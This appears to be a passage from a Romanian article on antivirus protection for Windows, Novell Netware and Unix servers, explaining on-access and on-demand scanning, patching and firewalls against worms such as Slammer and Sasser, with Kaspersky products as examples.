Particularitatea ambilor viermi este că modulul de verificare a sistemului de fișiere (chiar și la cerere, chiar și la acces) este neputincios împotriva lor. Acești viermi nu își salvează copiile pe disc și, în general, nu își arată prezența în sistem, cu excepția unei activități de rețea sporite. Astăzi, principala recomandare pentru protecție este instalarea la timp a patch-urilor pe sistemul de operare și software-ul folosit. O altă abordare este de a configura firewall-urile astfel încât porturile utilizate de serviciile vulnerabile să nu fie accesibile din exterior - o cerință rezonabilă în cazul protecției Slammer, dar nu este acceptabilă pentru protecția CodeRed.

Viermii care atacă servicii direct vulnerabile ale sistemului de operare, cum ar fi Lovesan, Sasser, Mytob, etc., rămân relevanți pentru serverele Windows. Protecția împotriva acestora ar trebui asigurată prin măsuri cuprinzătoare - utilizarea firewall-urilor, instalarea patch-urilor, aplicarea verificării accesului (viermii menționați în cazul unui atac reușit salvați-le fișierele pe hard disk).

Având în vedere natura atacurilor, putem concluziona că principalele mijloace de protecție a serverelor Windows sunt: \u200b\u200bmodulul de scanare a fișierelor la acces, modulul de scanare a fișierelor la cerere, modulul de verificare a scripturilor și principalele tehnologii sunt semnătura și analiza euristică (precum și comportamentală - în modulul de verificare script) ...

Servere Novell Netware

Nu există virusuri specifice care să poată infecta Novell Netware. Cu toate acestea, există mai mulți troieni care fură drepturile de acces la serverele Novell, dar acestea sunt totuși proiectate pentru a rula pe Windows.

În consecință, antivirus pentru serverul Novell Netware nu este de fapt conceput pentru a proteja acest server. Care sunt apoi funcțiile sale? În prevenirea răspândirii virusurilor. Majoritatea serverelor Novell Netware sunt utilizate ca servere de fișiere; utilizatorii Windows își pot stoca fișierele pe astfel de servere sau pot rula programe localizate pe volume Novell Netware. Pentru a preveni intrarea virușilor în resursele partajate ale serverului Novell sau lansarea / citirea virușilor din astfel de resurse, este necesar un antivirus.

Prin urmare, principalele instrumente utilizate în antivirus pentru Novell Netware sunt scanarea la acces și scanarea la cerere.

Dintre tehnologiile specifice utilizate în antivirusuri pentru Novell Netware, este necesar să se noteze blocarea stațiilor și / sau a utilizatorilor care scriu programe dăunătoare pe server.

Servere Unix

Putem spune același lucru despre serverele Unix ca despre serverele Novell Netware. Antivirus pentru serverele Unix nu rezolvă atât problema protejării serverelor în sine de infecție, cât problema prevenirii răspândirii virușilor prin server. Pentru aceasta, se folosesc toate aceleași două instrumente de bază:

  • Scanare de fișiere la cerere
  • Verificarea fișierelor în acces

Exemplu... Kaspersky Anti-Virus pentru serverele de fișiere Unix / Linux include un modul de scanare la acces, în timp ce Kaspersky Anti-Virus pentru stațiile de lucru Linux nu are un astfel de modul. Acest lucru se datorează diferitelor funcții ale stațiilor de lucru și serverelor Linux - într-o rețea construită exclusiv (sau mai ales) pe stațiile Linux, practic nu există pericol de infecție din partea virușilor și, prin urmare, nu este nevoie de un modul care să controleze toate operațiunile fișierelor. Dimpotrivă, dacă un computer Linux este utilizat în mod activ pentru stocarea și transferul fișierelor (în special pe o rețea Windows), atunci este, de fapt, un server și necesită un mijloc de control constant al fișierelor.

Mulți viermi cunoscuți sub Linux folosesc pentru a răspândi vulnerabilități nu în sistemul de operare în sine, ci în sistemul și software-ul de aplicații - în serverul wu-ftpd ftp, în serverul web Apache. Este clar că astfel de aplicații sunt utilizate mai des pe servere decât pe stațiile de lucru, ceea ce este un argument suplimentar în favoarea măsurilor de securitate a serverului îmbunătățite.

Spre deosebire de serverele Novell, unde suportul pentru rețelele Microsoft este încorporat, serverele Unix nu sunt configurate în mod implicit pentru a transfera fișiere prin SMB / CIFS. În acest scop, este folosit un pachet software special - Samba, care vă permite să creați resurse partajate compatibile cu rețelele Microsoft.

Dacă fișierele sunt schimbate doar prin protocoalele SMB / CIFS, atunci, evident, nu are sens să controlați toate operațiunile de fișiere, este suficient să verificați doar fișierele transferate folosind serverul Samba.

Exemplu... Linia de produse Kaspersky Lab include o soluție specială - Kaspersky Anti-Virus pentru Samba Server, concepută special pentru a proteja folderele partajate create pe serverele Unix folosind software-ul Samba. Acest produs nu include un modul care controlează operațiunile fișierelor, ci folosește un filtru încorporat în Samba care interceptează toate fișierele transferate.